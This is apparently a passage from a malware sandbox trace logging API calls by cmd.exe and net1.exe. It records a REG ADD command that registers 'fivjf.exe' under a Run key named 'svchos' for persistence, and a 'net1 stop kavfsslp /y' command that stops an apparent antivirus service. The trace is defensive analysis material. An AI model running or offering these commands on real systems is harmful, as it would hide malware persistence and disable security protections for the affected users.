_wcsicmp (_String1="REM/?", _String2="REG") returned 6 [0125.587] GetConsoleTitleW (in: lpConsoleTitle=0x18f610, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0125.588] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0125.588] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0125.588] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0125.588] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0125.588] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0125.588] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0125.588] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0125.588] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0125.588] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0125.588] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0125.588] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0125.588] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0125.588] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0125.588] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0125.588] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0125.588] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0125.588] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0125.588] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0125.588] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0125.588] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0125.588] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0125.588] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0125.588] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0125.588] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0125.588] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0125.588] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0125.588] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0125.588] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0125.588] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0125.588] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0125.588] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0125.588] _wcsicmp (_String1="REG", _String2="START") returned -1 [0125.588] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0125.588] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0125.588] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0125.589] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0125.589] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0125.589] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0125.589] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0125.589] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0125.589] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0125.589] _wcsicmp (_String1="REG", _String2="DIR") returned 14 [0125.589] _wcsicmp (_String1="REG", _String2="ERASE") returned 13 [0125.589] _wcsicmp (_String1="REG", _String2="DEL") returned 14 [0125.589] _wcsicmp (_String1="REG", _String2="TYPE") returned -2 [0125.589] _wcsicmp (_String1="REG", _String2="COPY") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="CD") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="CHDIR") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="RENAME") returned -7 [0125.589] _wcsicmp (_String1="REG", _String2="REN") returned -7 [0125.589] _wcsicmp (_String1="REG", _String2="ECHO") returned 13 [0125.589] _wcsicmp (_String1="REG", _String2="SET") returned -1 [0125.589] _wcsicmp (_String1="REG", _String2="PAUSE") returned 2 [0125.589] _wcsicmp (_String1="REG", _String2="DATE") returned 14 [0125.589] _wcsicmp (_String1="REG", _String2="TIME") returned -2 [0125.589] _wcsicmp (_String1="REG", _String2="PROMPT") returned 2 [0125.589] _wcsicmp (_String1="REG", _String2="MD") returned 5 [0125.589] _wcsicmp (_String1="REG", _String2="MKDIR") returned 5 [0125.589] _wcsicmp (_String1="REG", _String2="RD") returned 1 [0125.589] _wcsicmp (_String1="REG", _String2="RMDIR") returned -8 [0125.589] _wcsicmp (_String1="REG", _String2="PATH") returned 2 [0125.589] _wcsicmp (_String1="REG", _String2="GOTO") returned 11 [0125.589] _wcsicmp (_String1="REG", _String2="SHIFT") returned -1 [0125.589] _wcsicmp (_String1="REG", _String2="CLS") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="CALL") returned 15 [0125.589] _wcsicmp (_String1="REG", _String2="VERIFY") returned -4 [0125.589] _wcsicmp (_String1="REG", _String2="VER") returned -4 [0125.589] _wcsicmp (_String1="REG", _String2="VOL") returned -4 [0125.589] _wcsicmp (_String1="REG", _String2="EXIT") returned 13 [0125.589] _wcsicmp (_String1="REG", _String2="SETLOCAL") returned -1 [0125.589] _wcsicmp (_String1="REG", _String2="ENDLOCAL") returned 13 [0125.589] _wcsicmp (_String1="REG", _String2="TITLE") returned -2 [0125.589] _wcsicmp (_String1="REG", _String2="START") returned -1 [0125.590] _wcsicmp (_String1="REG", _String2="DPATH") returned 14 [0125.590] _wcsicmp (_String1="REG", _String2="KEYS") returned 7 [0125.590] _wcsicmp (_String1="REG", _String2="MOVE") returned 5 [0125.590] _wcsicmp (_String1="REG", _String2="PUSHD") returned 2 [0125.590] _wcsicmp (_String1="REG", _String2="POPD") returned 2 [0125.590] _wcsicmp (_String1="REG", _String2="ASSOC") returned 17 [0125.590] _wcsicmp (_String1="REG", _String2="FTYPE") returned 12 [0125.590] _wcsicmp (_String1="REG", _String2="BREAK") returned 16 [0125.590] _wcsicmp (_String1="REG", _String2="COLOR") returned 15 [0125.590] _wcsicmp (_String1="REG", _String2="MKLINK") returned 5 [0125.590] _wcsicmp (_String1="REG", _String2="FOR") returned 12 [0125.590] _wcsicmp (_String1="REG", _String2="IF") returned 9 [0125.590] _wcsicmp (_String1="REG", _String2="REM") returned -6 [0125.590] _wcsnicmp (_String1="REG", _String2="cmd ", _MaxCount=0x4) returned 15 [0125.590] SetErrorMode (uMode=0x0) returned 0x0 [0125.590] SetErrorMode (uMode=0x1) returned 0x0 [0125.590] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x1f1330, lpFilePart=0x18eea0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x18eea0*="Desktop") returned 0x25 [0125.590] SetErrorMode (uMode=0x0) returned 0x1 [0125.591] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0125.591] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0125.596] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a58f360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0125.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.599] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x18ec10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec10) returned 0xffffffffffffffff [0125.599] GetLastError () returned 0x2 [0125.599] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\REG", fInfoLevelId=0x1, lpFindFileData=0x18ec10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec10) returned 0xffffffffffffffff [0125.599] GetLastError () returned 0x2 [0125.599] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0125.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\REG.*", fInfoLevelId=0x1, lpFindFileData=0x18ec10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec10) returned 0x20c2d0 [0125.599] FindClose (in: hFindFile=0x20c2d0 | out: hFindFile=0x20c2d0) returned 1 [0125.599] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.COM", fInfoLevelId=0x1, lpFindFileData=0x18ec10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec10) returned 0xffffffffffffffff [0125.600] GetLastError () returned 0x2 [0125.600] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\reg.EXE", fInfoLevelId=0x1, lpFindFileData=0x18ec10, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x18ec10) returned 0x20c2d0 [0125.600] FindClose (in: hFindFile=0x20c2d0 | out: hFindFile=0x20c2d0) returned 1 [0125.600] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0125.600] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0125.600] GetConsoleTitleW (in: lpConsoleTitle=0x18f160, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b [0125.600] InitializeProcThreadAttributeList (in: lpAttributeList=0x18ef18, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x18eed8 | out: lpAttributeList=0x18ef18, lpSize=0x18eed8) returned 1 [0125.600] UpdateProcThreadAttribute (in: lpAttributeList=0x18ef18, dwFlags=0x0, Attribute=0x60001, lpValue=0x18eec8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x18ef18, lpPreviousValue=0x0) returned 1 [0125.600] GetStartupInfoW (in: lpStartupInfo=0x18f030 | out: lpStartupInfo=0x18f030*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1, hStdOutput=0x0, hStdError=0x0)) [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0125.600] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.601] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0125.601] lstrcmpW (lpString1="\\reg.exe", lpString2="\\XCOPY.EXE") returned -1 [0125.603] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\reg.exe", lpCommandLine="REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpStartupInfo=0x18ef50*(cb=0x70, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x18ef00 | out: lpCommandLine="REG ADD \"HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"svchos\" /t REG_SZ /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\fivjf.exe\" /f", lpProcessInformation=0x18ef00*(hProcess=0x54, hThread=0x50, dwProcessId=0xfa0, dwThreadId=0xeec)) returned 1 [0125.661] CloseHandle (hObject=0x50) returned 1 [0125.661] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0125.661] GetEnvironmentStringsW () returned 0x20adf0* [0125.661] FreeEnvironmentStringsW (penv=0x20adf0) returned 1 [0125.661] WaitForSingleObject (hHandle=0x54, dwMilliseconds=0xffffffff) returned 0x0 [0126.203] GetExitCodeProcess (in: hProcess=0x54, lpExitCode=0x18ee48 | out: lpExitCode=0x18ee48*=0x0) returned 1 [0126.203] CloseHandle (hObject=0x54) returned 1 [0126.203] _vsnwprintf (in: _Buffer=0x18f0b8, _BufferCount=0x13, _Format="%08X", _ArgList=0x18ee58 | out: _Buffer="00000000") returned 8 [0126.203] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0126.203] GetEnvironmentStringsW () returned 0x20c2f0* [0126.203] FreeEnvironmentStringsW (penv=0x20c2f0) returned 1 [0126.203] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0126.203] GetEnvironmentStringsW () returned 0x20c2f0* [0126.203] FreeEnvironmentStringsW (penv=0x20c2f0) returned 1 [0126.203] DeleteProcThreadAttributeList (in: lpAttributeList=0x18ef18 | out: lpAttributeList=0x18ef18) [0126.203] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.203] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0126.204] _get_osfhandle (_FileHandle=1) returned 0x7 [0126.204] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a58e194 | out: lpMode=0x4a58e194) returned 1 [0126.204] _get_osfhandle (_FileHandle=0) returned 0x3 [0126.204] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a58e198 | out: lpMode=0x4a58e198) returned 1 [0126.204] SetConsoleInputExeNameW () returned 0x1 [0126.204] GetConsoleOutputCP () returned 0x1b5 [0126.204] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a59bfe0 | out: lpCPInfo=0x4a59bfe0) returned 1 [0126.204] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0126.204] exit (_Code=0) Process: id = "412" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x73535000" os_pid = "0xce8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "404" os_parent_pid = "0xf10" cmd_line = "C:\\Windows\\system32\\net1 stop kavfsslp /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 14252 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 14253 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 14254 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 14255 start_va = 0x130000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 14256 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 14257 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 14258 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 14259 start_va = 0xffb10000 end_va = 0xffb42fff entry_point = 0xffb10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 14260 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 14261 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 14262 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 14263 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 14264 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 14265 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 14266 start_va = 0x350000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000350000" filename = "" Region: id = 14267 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 14268 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 14269 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 14270 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 14410 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 14411 start_va = 0x1b0000 end_va = 0x2affff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 14412 start_va = 0x320000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 14413 start_va = 0x7fef4380000 end_va = 0x7fef4391fff entry_point = 0x7fef4380000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 14414 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 14415 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 14416 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 14417 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 14418 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 14419 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 14420 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 14421 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 14422 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 14423 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 14424 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 14425 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 14426 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 14427 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 14428 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 14469 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 975 os_tid = 0xfe8 [0124.850] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1afab0 | out: lpSystemTimeAsFileTime=0x1afab0*(dwLowDateTime=0xff72eb70, dwHighDateTime=0x1d48689)) [0124.850] GetCurrentProcessId () returned 0xce8 [0124.850] GetCurrentThreadId () returned 0xfe8 [0124.850] GetTickCount () returned 0x28cb4 [0124.850] QueryPerformanceCounter (in: lpPerformanceCount=0x1afab8 | out: lpPerformanceCount=0x1afab8*=1817176800000) returned 1 [0124.851] GetModuleHandleW (lpModuleName=0x0) returned 0xffb10000 [0124.851] __set_app_type (_Type=0x1) [0124.851] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffb29c9c) returned 0x0 [0124.851] __getmainargs (in: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788, _DoWildCard=0, _StartInfo=0xffb3479c | out: _Argc=0xffb34780, _Argv=0xffb34790, _Env=0xffb34788) returned 0 [0124.851] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0124.851] GetConsoleOutputCP () returned 0x1b5 [0124.864] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffb3cec0 | out: lpCPInfo=0xffb3cec0) returned 1 [0124.864] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0124.868] sprintf_s (in: _DstBuf=0x1afa58, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0124.868] setlocale (category=0, locale=".437") returned="English_United States.437" [0124.872] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0124.872] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0124.872] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop kavfsslp /y" [0124.872] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1af7f0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0124.872] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0124.872] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa48 | out: Buffer=0x1afa48*=0x364d40) returned 0x0 [0124.872] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1afa48 | out: Buffer=0x1afa48*=0x36c0e0) returned 0x0 [0124.872] _fileno (_File=0x7fefdba2a80) returned 0 [0124.872] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0124.872] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0124.872] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0124.872] _wcsicmp (_String1="config", _String2="stop") returned -16 